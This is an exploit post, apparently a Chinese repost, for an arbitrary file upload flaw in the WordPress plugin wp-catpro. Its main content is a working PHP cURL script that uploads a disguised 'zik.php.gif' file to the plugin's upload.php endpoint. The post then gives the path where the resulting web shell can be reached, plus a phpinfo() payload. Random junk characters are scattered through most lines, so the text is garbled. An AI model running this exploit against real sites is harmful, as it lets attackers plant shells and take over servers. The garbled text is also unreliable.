WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
$ X6 }, Y1 N/ _1 V! Y7 g: W
9 f0 M  M) d. q0 o0 f作者  => Zikou-16
邮箱 => zikou16x@gmail.com
% A$ m# h; I. p测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
! y* v1 Q9 w+ ~4 |# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
' ~3 M( {+ w6 r% c# {# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
$ p( V) W5 R1 y# j------------------

#=> Exploit
. X3 k9 o/ i7 Y+ ^4 ^. g2 |-----------
<?php

. l2 d0 Q) Y, m$ |$uploadfile="zik.php.gif";
3 m- M! P+ ]/ S1 D7 w) |; r0 ?# g$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
+ x5 F. q6 n8 i" N: S' f6 b/ o' a( bcurl_setopt($ch, CURLOPT_POST, true);
( S- _6 M: g+ d1 H' [3 zcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
# s; H. N2 C+ E$ [6 z'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
# u7 v) O4 c2 z  ]$postResult = curl_exec($ch);
4 Q$ b% {4 |2 D1 N# O, \  ccurl_close($ch);
! _- N* m8 }- L/ X, m
print "$postResult";
/ e; E$ v' q) m5 A# b; K/ v% \$ J
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
% S0 `3 l) a6 ~! ]<?php
phpinfo();
?>